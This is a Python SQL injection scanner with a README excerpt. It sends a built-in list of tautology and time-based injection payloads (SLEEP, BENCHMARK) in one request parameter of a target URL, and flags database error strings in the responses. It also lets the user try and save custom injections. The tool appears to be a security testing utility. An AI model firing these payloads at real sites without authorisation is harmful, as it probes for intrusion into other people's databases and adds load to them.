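#!/usr/bin/env python3
# Repository layout:
#   ├── README.md
#   └── SQLInjection.py
#
# /README.md:
#   # sqlScanner
#   This is a script that scans an IP address or URL for SQL Injection
#   vulnerabilities. If any are found, it includes an extensive library of
#   ready-to-use injection techniques, and you can also utilize your own
#   custom injections.
#
# /SQLInjection.py:
"""Error-based SQL injection probe for one request parameter.

The script sends each payload as the value of a single parameter and looks
for known database error strings in the response body.

Limits of the approach, as implemented here:

* A match only means an error string appeared in the response.  It is a lead
  to confirm by hand, not proof; strings such as "SQLSTATE" or "Query failed"
  can appear on a page regardless of the payload.
* A target that suppresses database errors produces no match even if the
  parameter is injectable, so "no match" is not a clean bill of health.
* No baseline (benign-value) request is made, so pre-existing error text on
  the page is not filtered out.
"""

import argparse
import concurrent.futures
import csv

import requests

# Seconds passed to requests as the connect/read timeout.  Without it a
# stalled target blocks a worker thread indefinitely.
REQUEST_TIMEOUT = 15

# Default payloads
# NOTE: the last two entries are time-based (SLEEP / BENCHMARK).  Nothing in
# this script measures response time, so they can only be flagged through an
# error string; on a backend that does execute them they delay the response
# and add load to the database under test.
default_payloads = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR '1'='1' #",
    "' OR '1'='1' /*",
    "' OR 'a'='a",
    "' OR 'a'='a' --",
    "' OR 'a'='a' #",
    "' OR 'a'='a' /*",
    "' OR 1=1",
    "' OR 1=1 --",
    "' OR 1=1 #",
    "' OR 1=1 /*",
    "' OR '1'='1' AND SLEEP(5) --",
    "' OR '1'='1' AND BENCHMARK(1000000,MD5(1)) --",
]

# SQL errors for different databases
# NOTE: the 'MySQL' list is effectively a catch-all; it also holds SQL Server,
# Oracle (ORA-01756) and PostgreSQL strings, so the key that matched does not
# reliably identify the backend.
db_errors = {
    'MySQL': [
        "You have an error in your SQL syntax;",
        "Warning: mysql_fetch_assoc()",
        "Warning: mysql_num_rows()",
        "Warning: mysql_fetch_array()",
        "Unclosed quotation mark after the character string",
        "Microsoft OLE DB Provider for SQL Server",
        "mysql_num_rows() expects parameter 1 to be resource",
        "supplied argument is not a valid MySQL",
        "ORA-01756",
        "Error: unknown column",
        "Query failed",
        "SQLSTATE",
        "Warning: pg_exec",
        "pg_query(): Query failed",
        "unterminated quoted string",
    ],
    'PostgreSQL': [
        "ERROR: syntax error at or near",
        "pg_query(): Query failed",
    ],
    'MSSQL': [
        "SQL Server does not exist or access denied",
        "OLE DB provider for linked server",
    ],
    # Add more databases as needed
}


def is_vulnerable(response, db_type='MySQL'):
    """Return True if the response body contains an error string for db_type.

    Args:
        response: Object with a ``text`` attribute (a requests response).
        db_type: Key into ``db_errors``; an unknown key yields False.

    The comparison is case-insensitive substring matching, nothing more.
    """
    signatures = db_errors.get(db_type, [])
    if not signatures:
        return False
    # Lower-case the body once instead of once per signature.
    body = response.text.lower()
    return any(signature.lower() in body for signature in signatures)


def make_request(url, param, payload, method='GET', cookies=None):
    """Send one request carrying ``payload`` as the value of ``param``.

    POST, PUT and DELETE send the parameter as form data; any other method
    value falls back to GET with the parameter in the query string.

    Returns the requests response.  Network errors and timeouts propagate to
    the caller as exceptions.
    """
    # The context manager closes the session's connection pool; the response
    # body has already been read by then because streaming is not enabled.
    with requests.Session() as session:
        if cookies:
            session.cookies.update(cookies)

        if method in ('POST', 'PUT', 'DELETE'):
            return session.request(
                method, url, data={param: payload}, timeout=REQUEST_TIMEOUT
            )
        return session.get(url, params={param: payload}, timeout=REQUEST_TIMEOUT)


def test_sql_injection(url, param, payloads, method='GET', cookies=None,
                       results=None):
    """Send every payload and report whether any response shows a SQL error.

    Args:
        url: Target URL.
        param: Name of the parameter that carries the payload.
        payloads: Iterable of payload strings.
        method: HTTP method passed to ``make_request``.
        cookies: Optional dict of cookies.
        results: Optional list.  When given, one row per payload is appended
            with the keys URL, Parameter, Payload and Vulnerable, matching
            the columns written by ``export_results``.  Vulnerable is True or
            False, or the string 'error' when the request itself failed and
            the payload was therefore not evaluated.

    Returns:
        True if at least one response matched an entry in ``db_errors``.

    All payloads are submitted to the thread pool up front and run
    concurrently, so every request is sent even after the first match.
    """
    found = False
    with concurrent.futures.ThreadPoolExecutor() as executor:
        future_to_payload = {
            executor.submit(make_request, url, param, payload, method, cookies): payload
            for payload in payloads
        }
        for future in concurrent.futures.as_completed(future_to_payload):
            payload = future_to_payload[future]
            try:
                response = future.result()
            except Exception as exc:
                # Best effort: one failed request must not abort the run.
                print(f'Payload {payload} generated an exception: {exc}')
                outcome = 'error'
            else:
                # Check every signature list, not only the default 'MySQL'
                # one, so the PostgreSQL and MSSQL entries are actually used.
                outcome = any(is_vulnerable(response, db) for db in db_errors)
                if outcome:
                    print(f"Possible SQL Injection vulnerability detected with payload: {payload}")
                    found = True
            if results is not None:
                results.append({
                    'URL': url,
                    'Parameter': param,
                    'Payload': payload,
                    'Vulnerable': outcome,
                })
    return found


def export_results(results, filename='results.csv'):
    """Write result rows to ``filename`` as CSV.

    Each row is a dict with the keys URL, Parameter, Payload and Vulnerable.
    The file is overwritten if it exists.
    """
    fieldnames = ['URL', 'Parameter', 'Payload', 'Vulnerable']
    with open(filename, 'w', newline='', encoding='utf-8') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        writer.writerows(results)


def main():
    """Parse the command line, run the probe and optionally export results."""
    # Custom startup message
    print("██████╗░██╗░░░░░██╗███╗░░██╗██████╗░███╗░░░███╗░█████╗░░░███╗░░██████╗░███████╗███╗░░██╗")
    print("██╔══██╗██║░░░░░██║████╗░██║██╔══██╗████╗░████║██╔══██╗░████║░░██╔══██╗██╔════╝████╗░██║")
    print("██████╦╝██║░░░░░██║██╔██╗██║██║░░██║██╔████╔██║███████║██╔██║░░██║░░██║█████╗░░██╔██╗██║")
    print("██╔══██╗██║░░░░░██║██║╚████║██║░░██║██║╚██╔╝██║██╔══██║╚═╝██║░░██║░░██║██╔══╝░░██║╚████║")
    print("██████╦╝███████╗██║██║░╚███║██████╔╝██║░╚═╝░██║██║░░██║███████╗██████╔╝███████╗██║░╚███║")
    print("╚═════╝░╚══════╝╚═╝╚═╝░░╚══╝╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚══════╝╚═════╝░╚══════╝╚═╝░░╚══╝")
    print("SQLScanner")
    print("Author: @blindma1den.\n")

    parser = argparse.ArgumentParser(description="SQL Injection vulnerability detector")
    parser.add_argument("url", help="Target URL (e.g., http://example.com/search.php)")
    parser.add_argument("param", help="Parameter to test for SQL Injection")
    parser.add_argument("--method", choices=['GET', 'POST', 'PUT', 'DELETE'], default='GET', help="HTTP method to use")
    parser.add_argument("--cookies", help="Cookies to include in the requests (format: key=value,key=value)")
    parser.add_argument("--custom-payloads", help="File with custom payloads", type=argparse.FileType('r'))
    parser.add_argument("--save-payload", help="Save custom payload to file", type=str)
    parser.add_argument("--export-results", help="Export results to a CSV file", type=str)

    args = parser.parse_args()
    url = args.url
    param = args.param
    method = args.method

    # Convert cookies string to dictionary
    cookies = None
    if args.cookies:
        cookies = {}
        for pair in args.cookies.split(','):
            # Split on the first '=' only: cookie values (base64, signed
            # tokens) often contain '=' themselves.
            name, separator, value = pair.partition('=')
            if not separator:
                parser.error(f"invalid cookie '{pair}', expected key=value")
            cookies[name.strip()] = value

    # Load payloads
    payloads = default_payloads
    if args.custom_payloads:
        with args.custom_payloads as payload_file:
            # Blank lines would otherwise be sent as empty payloads.
            payloads = [line.strip() for line in payload_file if line.strip()]
        if not payloads:
            parser.error("the custom payload file contains no payloads")

    print(f"Testing {url} for SQL Injection vulnerabilities on parameter '{param}' with method '{method}'...")

    # Filled by test_sql_injection so that --export-results has rows to write.
    results = []
    if test_sql_injection(url, param, payloads, method, cookies, results):
        print("The site is vulnerable to SQL Injection.")
        while True:
            try:
                option = input("Do you want to test more injections? (y/n): ").strip().lower()
            except EOFError:
                # Non-interactive stdin: stop prompting and go on to export.
                break
            if option == 'n':
                break
            elif option == 'y':
                custom_payload = input("Enter the SQL injection to test: ").strip()
                if test_sql_injection(url, param, [custom_payload], method, cookies, results):
                    print(f"The custom payload '{custom_payload}' is vulnerable.")
                    if args.save_payload:
                        with open(args.save_payload, 'a', encoding='utf-8') as file:
                            file.write(custom_payload + '\n')
                        print(f"Payload '{custom_payload}' saved to {args.save_payload}.")
                else:
                    print(f"The custom payload '{custom_payload}' is not vulnerable.")
            else:
                print("Invalid option. Please enter 'y' or 'n'.")
    else:
        print("No SQL Injection vulnerabilities detected.")

    # Export results if needed
    if args.export_results:
        export_results(results, args.export_results)
        print(f"Results exported to {args.export_results}.")


if __name__ == "__main__":
    main()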